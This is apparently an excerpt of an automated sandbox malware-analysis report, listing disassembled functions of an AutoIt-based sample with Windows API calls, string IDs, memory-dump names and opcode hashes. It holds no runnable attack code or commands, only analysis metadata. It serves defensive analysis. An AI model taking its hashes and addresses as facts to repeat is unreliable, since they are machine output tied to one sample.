                                                        • Part of subcall function 00E39CB3: _wcslen.LIBCMT ref: 00E39CBD
                                                        • Part of subcall function 00E93CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00E93CCA
                                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 00E91CC8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameSend_wcslen
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 624084870-1403004172
                                                      • Opcode ID: a8134e94be911af5bcedb2146eafdb267f085a6d28a1ae39a5762538ae11a986
                                                      • Instruction ID: f6c6f26a369cc1fe321882f91d72c15a109be11f9f9b3143245501ff3e38e451
                                                      • Opcode Fuzzy Hash: a8134e94be911af5bcedb2146eafdb267f085a6d28a1ae39a5762538ae11a986
                                                      • Instruction Fuzzy Hash: 6301D67568021977CF18EBA0CA05EFEF7E89B11340F642015B902B3282EAA19F08C672
                                                      APIs
                                                        • Part of subcall function 00E39CB3: _wcslen.LIBCMT ref: 00E39CBD
                                                        • Part of subcall function 00E93CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00E93CCA
                                                      • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00E91DD3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameSend_wcslen
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 624084870-1403004172
                                                      • Opcode ID: 18ff3c3c08934cefa5f005219832d3015be145dff673feafebbde7a6f568268d
                                                      • Instruction ID: 21429a245a0a6c21a5e94239fb2a71af308796b6484b4d3e7bd6ff149c9adc59
                                                      • Opcode Fuzzy Hash: 18ff3c3c08934cefa5f005219832d3015be145dff673feafebbde7a6f568268d
                                                      • Instruction Fuzzy Hash: 41F0F471A4031966CF08E7A4CD56EFEBBA8AB01340F142915F922B32C2DBA05908C260
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: _wcslen
                                                      • String ID: 3, 3, 16, 1
                                                      • API String ID: 176396367-3042988571
                                                      • Opcode ID: e0161d8691f93e112afc685d47b2f0fc2fee84cf820f821ccbe663070f9dc364
                                                      • Instruction ID: 0a6704b582cd85f9c8bbe51b8b3ab7ca4431a176878685453b400f444ea6eea9
                                                      • Opcode Fuzzy Hash: e0161d8691f93e112afc685d47b2f0fc2fee84cf820f821ccbe663070f9dc364
                                                      • Instruction Fuzzy Hash: A2E02B5260532120933112799CC29BF5AC9CFC57567103C2BFDD1F22A6EA948DD193A0
                                                      APIs
                                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00E90B23
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Message
                                                      • String ID: AutoIt$Error allocating memory.
                                                      • API String ID: 2030045667-4017498283
                                                      • Opcode ID: c7f1e81079d5f6558108c00e75aadcfe27a9a938d0e7fe701478b0794c2c4f29
                                                      • Instruction ID: 51924ae27c125ebe0112d7ab50e63363ba615135d7fc187ba699333b6aa1a2d2
                                                      • Opcode Fuzzy Hash: c7f1e81079d5f6558108c00e75aadcfe27a9a938d0e7fe701478b0794c2c4f29
                                                      • Instruction Fuzzy Hash: 69E048322443183AD21436557D07FC97AC48F45F65F20642BFB9C755C38AE2649156A9
                                                      APIs
                                                        • Part of subcall function 00E4F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00E50D71,?,?,?,00E3100A), ref: 00E4F7CE
                                                      • IsDebuggerPresent.KERNEL32(?,?,?,00E3100A), ref: 00E50D75
                                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00E3100A), ref: 00E50D84
                                                      Strings
                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00E50D7F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                      • API String ID: 55579361-631824599
                                                      • Opcode ID: 3b67903e7414bbe3ae9282140488b501afced516580c761c9f0a1658a26f9d6b
                                                      • Instruction ID: 542baa9c27e320ce448c3d80526dfd952d5fa99b2ebaabb668742b5dab82c29c
                                                      • Opcode Fuzzy Hash: 3b67903e7414bbe3ae9282140488b501afced516580c761c9f0a1658a26f9d6b
                                                      • Instruction Fuzzy Hash: 13E06D702007418FD3249FB9E508B427BF1BF00745F005D2DF886E6661DBB6E4498B91
                                                      APIs
                                                      • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00EA302F
                                                      • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00EA3044
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Temp$FileNamePath
                                                      • String ID: aut
                                                      • API String ID: 3285503233-3010740371
                                                      • Opcode ID: 5441a65b32a478037ca8cc81946ac44cf8410cf7d9e2c1e326ede3efa09f640b
                                                      • Instruction ID: 0352ae56872eb3a32d438b4b77908c616eaf9ccb23681b213e6f9e9ae7764f68
                                                      • Opcode Fuzzy Hash: 5441a65b32a478037ca8cc81946ac44cf8410cf7d9e2c1e326ede3efa09f640b
                                                      • Instruction Fuzzy Hash: 5ED05B71500318ABDA20D7A59C0DFD73A6CD704750F000161BA55F20A1DAB19545CAD0
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: LocalTime
                                                      • String ID: %.3d$X64
                                                      • API String ID: 481472006-1077770165
                                                      • Opcode ID: 80b567d154d497b0cfa691ba3c3f9fe59936e74b1fbd64ef54baff854657116c
                                                      • Instruction ID: e3455203406c55d858182c508ee68caad179110d2e9e50033fba14dc72b60f98
                                                      • Opcode Fuzzy Hash: 80b567d154d497b0cfa691ba3c3f9fe59936e74b1fbd64ef54baff854657116c
                                                      • Instruction Fuzzy Hash: BCD0126184D108F9CB50A6D0DC49CF9B3BCEB08301F60A462F90EB2090E634C5086761
                                                      APIs
                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00EC236C
                                                      • PostMessageW.USER32(00000000), ref: 00EC2373
                                                        • Part of subcall function 00E9E97B: Sleep.KERNEL32 ref: 00E9E9F3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: FindMessagePostSleepWindow
                                                      • String ID: Shell_TrayWnd
                                                      • API String ID: 529655941-2988720461
                                                      • Opcode ID: 709fcd496c4412612b4c859c0b0d3f2232a72271dfedcf4d822cb4157626de11
                                                      • Instruction ID: a66ccbdce016a681e250587143a4c7c7a2a16fcea8a4f51ddc081426732137ad
                                                      • Opcode Fuzzy Hash: 709fcd496c4412612b4c859c0b0d3f2232a72271dfedcf4d822cb4157626de11
                                                      • Instruction Fuzzy Hash: ECD0C9327813107BE664B7729C0FFC666549B44B14F105926B74AFA1E0C9A5A8068A55
                                                      APIs
                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00EC232C
                                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00EC233F
                                                        • Part of subcall function 00E9E97B: Sleep.KERNEL32 ref: 00E9E9F3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: FindMessagePostSleepWindow
                                                      • String ID: Shell_TrayWnd
                                                      • API String ID: 529655941-2988720461
                                                      • Opcode ID: 72f12f6ab45ce2f8cbc1d392f5a4b98af83d968ddec32a51f019d505631fcbec
                                                      • Instruction ID: b0d07a93cbfe6ed85c1d03697288d4604566c61e875b2e676d991d95f7328646
                                                      • Opcode Fuzzy Hash: 72f12f6ab45ce2f8cbc1d392f5a4b98af83d968ddec32a51f019d505631fcbec
                                                      • Instruction Fuzzy Hash: 14D02232780300BBE664B332DC0FFC67A049B00B00F100926B30AFA1E0C8F1A806CB00
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00E6BE93
                                                      • GetLastError.KERNEL32 ref: 00E6BEA1
                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00E6BEFC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$ErrorLast
                                                      • String ID:
                                                      • API String ID: 1717984340-0
                                                      • Opcode ID: 600f7405aaba6f1738afbc70b853f519a92842e6f1312519983840b42efdafd8
                                                      • Instruction ID: f086ba6a0dd3022c74e6e2c1f38aaca398280dd03cfeddb77b90aadf1efb7801
                                                      • Opcode Fuzzy Hash: 600f7405aaba6f1738afbc70b853f519a92842e6f1312519983840b42efdafd8
                                                      • Instruction Fuzzy Hash: EE411635780206AFCF218F65EC44ABA7BA5EF41394F246169F959F71B1DB318C81CB60